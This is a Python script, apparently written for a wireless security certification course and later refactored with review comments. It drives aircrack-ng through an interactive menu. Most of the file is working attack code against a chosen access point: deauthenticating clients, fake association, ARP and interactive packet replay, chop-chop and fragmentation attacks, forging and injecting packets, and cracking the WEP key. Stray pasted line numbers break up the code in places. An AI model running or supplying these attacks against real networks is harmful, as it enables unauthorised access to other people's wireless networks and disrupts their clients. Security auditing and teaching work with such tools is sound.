#!/usr/bin/python
# WEP and WPA Auditing tool
# Coded by MrMe
# Uses aircrack-ng 'http://aircrack-ng.org/doku.php'
# WARNING: This script assumes you know something about wifi
# I wrote this script because I can't remember the syntax :(
# Also made to destroy the wifu exam
#
  9.  
  10. import hashlib, sys, os,fileinput, re, time, thread
  11. from optparse import OptionParser
  12.  
# Command-line interface: one option, -i <interface>, stored as options.intf.
usage = "\n".join(("./%prog -i interface", "Example: ./%prog -i ath0"))
parser = OptionParser(usage=usage)
parser.add_option(
    "-i",
    dest="intf",
    action="store",
    type="string",
    help="Your interface",
)
options, args = parser.parse_args()
  20.  
def banner():
    """Print the four-line tool banner with a blank line before and after it."""
    rows = (
        "\n|---------------------------------------------------|",
        "| WEP & WPA auditing tool made during WIFU :) |",
        "| by MrMe 07/2009 |",
        "|---------------------------------------------------|\n",
    )
    # One print of the joined rows emits the same bytes as four prints.
    print("\n".join(rows))
  26.  
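def is_there_aircrack():
    """Exit with install hints unless aircrack-ng appears to be installed.

    Runs ``aircrack-ng`` with no arguments through the shell and looks for
    the project URL in what it writes to stdout. When the URL is missing
    the banner and two package-manager hints are printed and the process
    exits; the exit status stays 0, as before.
    """
    probe = os.popen("aircrack-ng")
    try:
        output = probe.read()
    finally:
        # Close the pipe explicitly instead of leaving it to the collector.
        probe.close()

    # Plain substring test: the previous regex left its dots unescaped, so
    # they matched any character.
    # NOTE(review): a build that prints the URL in another form (for example
    # a different scheme) would be reported as missing -- confirm against
    # the installed version.
    if "http://www.aircrack-ng.org" in output:
        return

    banner()
    print("[-] Please install aircrack-ng before continuing")
    print("[-] apt-get install aircrack-ng")
    print("[-] yum install aircrack-ng")
    sys.exit(0)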
  35.  
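# Refuse to start without an interface. Testing the parsed option instead of
# len(sys.argv) also rejects runs such as "./prog a b", which used to pass
# the length test with options.intf unset and then crashed when the
# interface name was concatenated into a command line. Leftover positional
# arguments are still rejected.
if not options.intf or args:
    banner()
    parser.print_help()
    sys.exit(1)

# some global variables
verbose = 'true'     # string flag; the menu code compares it with 'true'
intf = options.intf  # interface name; it is concatenated into shell commands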
  44.  
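def reset():
    """Reload the kernel driver module for the selected interface.

    Only 'ath0' (module ath_pci) and 'wlan0' (module r8187) are handled;
    any other interface prints a not-supported message. Success is reported
    only when modprobe exits with status 0; previously the ready message
    was printed whether or not the module had loaded.
    """
    drivers = {'ath0': 'ath_pci', 'wlan0': 'r8187'}
    module = drivers.get(intf)
    if module is None:
        print("[-] Interface not supported for this option")
        return

    # rmmod can fail simply because the module is not loaded, so only the
    # modprobe status decides whether the reload worked.
    os.system("rmmod "+module)
    if os.system("modprobe "+module) != 0:
        print("\n[-] modprobe "+module+" failed, driver not loaded")
        return
    print("\n[+] Loaded and ready")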
  56.  
def targetSetup():
    """Run ``airmon-ng stop`` on the interface, then ``airmon-ng start``.

    For 'ath0' the start command is issued for 'wifi0'; every other
    interface is started under its own name. Exit statuses are not checked.
    """
    os.system("airmon-ng stop "+intf)
    device = 'wifi0' if intf == 'ath0' else intf
    os.system('airmon-ng start '+device)
  63.  
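def execute():
    """Run the interactive menu that drives the aircrack-ng tools.

    Loops until option 13 is chosen. Option 2 collects the target details
    (channel, BSSID, ESSID, local MAC) that options 3-12 reuse. Commands are
    still built as strings and run through the shell with os.system and
    os.popen.

    Input handling:
      * BSSID and MAC answers must be six colon-separated hex octets, and
        the channel must be numeric. A 17-character answer of any content
        used to be accepted.
      * The ESSID and the interface name are shell-quoted before they are
        placed in a command line. The ESSID is set by whoever operates the
        access point, so it is untrusted text; unquoted, shell
        metacharacters in it would run with this script's privileges.
      * Options 3-12 ask for option 2 to be run first instead of failing
        with a NameError when no target has been stored.
      * Option 3 reads the aireplay-ng output once. The earlier second
        read() on the already drained pipe was always empty, so the
        "No such BSSID" check could never fire.

    NOTE(review): the ESSID is also used as the capture-file prefix; an
    ESSID containing '/' or starting with '-' is quoted but not otherwise
    restricted.
    """
    try:
        from shlex import quote  # Python 3.3+
    except ImportError:
        from pipes import quote  # Python 2

    mac_format = re.compile(r'^[0-9A-Fa-f]{2}(?::[0-9A-Fa-f]{2}){5}\Z')
    needs_target = frozenset(str(n) for n in range(3, 13))
    menu = (
        "\n|--------------------------------|",
        "| Select an option type |",
        "|--------------------------------|\n",
        "[1] Reset the driver modules",
        "[2] Setup wifi NIC and choose target",
        "[3] Injection test against target",
        "[4] De-authenticate a client",
        "[5] Fake associate with the AP",
        "[6] Shared key fake association",
        "[7] Interactive packet replay",
        "[8] Arp request replay",
        "[9] Korek chop chop attack",
        "[10] Fragmentation attack",
        "[11] Forge and inject using the xor file",
        "[12] Crack the WEP key",
        "[13] Exit\n",
    )

    def ask_mac(prompt, retry_message):
        # Re-prompt until the answer has the xx:xx:xx:xx:xx:xx hex form.
        value = raw_input(prompt)
        while not mac_format.match(value):
            print(retry_message)
            value = raw_input(prompt)
        return value

    def show(cmd, quoted):
        # Echo the command when verbose. Both layouts are kept because the
        # menu options have always differed in whether they add quotes.
        if verbose == 'true':
            if quoted:
                print('[+] Command: "'+cmd+'"\n')
            else:
                print("[+] Command: "+cmd+'\n')

    def capture(cmd, quoted):
        # Start cmd, echo it, then read its stdout exactly once.
        pipe = os.popen(cmd)
        show(cmd, quoted)
        output = pipe.read()
        pipe.close()
        if verbose == 'true':
            print(output)
        return output

    q_intf = quote(intf)
    # Target details; they stay None until option 2 has been completed.
    bssid = essid = q_essid = mymac = ch = None
    # Handle of the scanning xterm. It is kept referenced on purpose:
    # dropping it would close the pipe, which can block until xterm exits.
    scan = None

    while True:
        print("\n".join(menu))
        option = raw_input('[+] Please enter a value: ')

        if option == '13':
            print("[+] Hope you had fun")
            sys.exit(0)

        if option in needs_target and bssid is None:
            print("[-] Please run option 2 first to choose a target")
            continue

        if option == '1':
            reset()

        elif option == '2':
            targetSetup()
            print("\n[+] Gathering target information..")
            scan = os.popen('xterm -T "Searching for target AP\'s" -e airodump-ng '+q_intf)
            time.sleep(3)
            ch = raw_input('[+] Please enter target channel: ')
            bssid = ask_mac(
                '[+] Please enter the target BSSID: ',
                '\n[-] Check your BSSID and enter it again. Eg: 00:1b:2f:67:9b:f3',
            )
            essid = raw_input('[+] Please enter the target ESSID: ')
            mymac = ask_mac(
                '[+] Please enter the MAC addess for '+intf+': ',
                '\n[-] Check your MAC address and enter it again. Eg: 00:1b:2f:67:9b:f3',
            )
            # The channel goes into command lines unquoted, so it has to be
            # digits only; the BSSID and MAC were already format-checked.
            if not essid or not ch.isdigit():
                print('\n[-] Please enter the details correctly next time.. exiting..')
                sys.exit(0)
            q_essid = quote(essid)
            print("[+] Setting up your interface for the specifid target..")
            os.system("airmon-ng stop "+q_intf)
            if intf == 'ath0':
                os.system('airmon-ng start wifi0 '+ch)
            else:
                os.system('airmon-ng start '+q_intf+' '+ch)
            dump = ('xterm -T "Dumping target" -e airodump-ng -c '+ch
                    +' --bssid '+bssid+' -w '+q_essid+' '+q_intf+' &')
            os.system(dump)
            time.sleep(3)
            print('\n[+] Ready to rock and roll! :)')

        elif option == '3':
            print("[+] Testing AP please wait..")
            output = capture('aireplay-ng -9 -e '+q_essid+' -a '+bssid+' '+q_intf, False)
            if re.search("No such BSSID", output):
                print("[-] Please check your BSSID!")
                sys.exit(0)
            else:
                # NOTE(review): this only means "No such BSSID" was absent
                # from the output; it is not a positive injection result.
                print("[+] Injection is working!")

        elif option == '4':
            client = ask_mac(
                '[+] Please enter the targets clients MAC: ',
                '\n[-] Check the client MAC and enter it again. Eg: 00:1b:2f:67:9b:f3',
            )
            print("[+] Deauth'ing with 1 packets please wait..")
            capture('aireplay-ng -0 1 -e '+q_essid+' -a '+bssid+' -c '+client+' '+q_intf, True)

        elif option == '5':
            print("[+] Associating with the AP please wait..")
            capture('aireplay-ng -1 0 -e '+q_essid+' -a '+bssid+' -h '+mymac+' '+q_intf, True)

        elif option == '6':
            print("[+] Associating with the AP please wait..")
            print("[+] Using shared key..")
            # The quoted ESSID is followed by an unquoted *.xor so the shell
            # still expands the glob.
            capture('aireplay-ng -1 0 -e '+q_essid+' -y '+q_essid+'*.xor -a '+bssid
                    +' -h '+mymac+' '+q_intf, True)

        elif option == '7':
            print("[+] Starting interactive packet replay attack..")
            inter = 'aireplay-ng -2 -b '+bssid+' -d FF:FF:FF:FF:FF:FF -t 1 '+q_intf
            show(inter, False)
            print("[+] Now try deauth'ing a client or wait..")
            print("[+] If you get a ARP packet then crack the key")
            os.system(inter)

        elif option == '8':
            print("[+] Starting ARP request replay attack..")
            print("[+] If you get a ARP packet then crack the key")
            arp = 'aireplay-ng -3 -b '+bssid+' -h '+mymac+' '+q_intf
            show(arp, False)
            os.system(arp)

        elif option == '9':
            print("[+] Starting Korek chop chop attack..")
            chop = 'aireplay-ng -4 -h '+mymac+' -b '+bssid+' '+q_intf
            show(chop, True)
            os.system(chop)

        elif option == '10':
            print("[+] Starting fragmentation attack..")
            frag = 'aireplay-ng -5 -b '+bssid+' -h '+mymac+' '+q_intf
            show(frag, True)
            os.system(frag)

        elif option == '11':
            print("[+] Forging arbitary data packet..")
            forge = ('packetforge-ng -0 -a '+bssid+' -h '+mymac
                     +' -k 255.255.255.255 -l 255.255.255.255 -y *.xor -w arp-request')
            show(forge, True)
            os.system(forge)
            print("[+] Now lets inject the forged packet :)")
            # xterm receives the inner command as a single -e argument, so
            # the whole inner command line is quoted as one word.
            inject = ('xterm -T "Injecting forged packet" -e '
                      +quote('aireplay-ng -2 -r arp-request '+q_intf)+' &')
            os.system(inject)
            time.sleep(3)

        elif option == '12':
            print("[+] Crack time!")
            print("[+] aircrack-ng -0 -z "+q_essid+"*.cap\n")
            # Two shell layers parse this: the ESSID is quoted for the inner
            # command, then the inner command is quoted for the outer one.
            inner = 'aircrack-ng -0 -z '+q_essid+'*.cap; bash'
            os.system('xterm -T "Cracking.." -e '+quote(inner))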
# Entry sequence: dependency check, banner, then the interactive menu.
for step in (is_there_aircrack, banner, execute):
    step()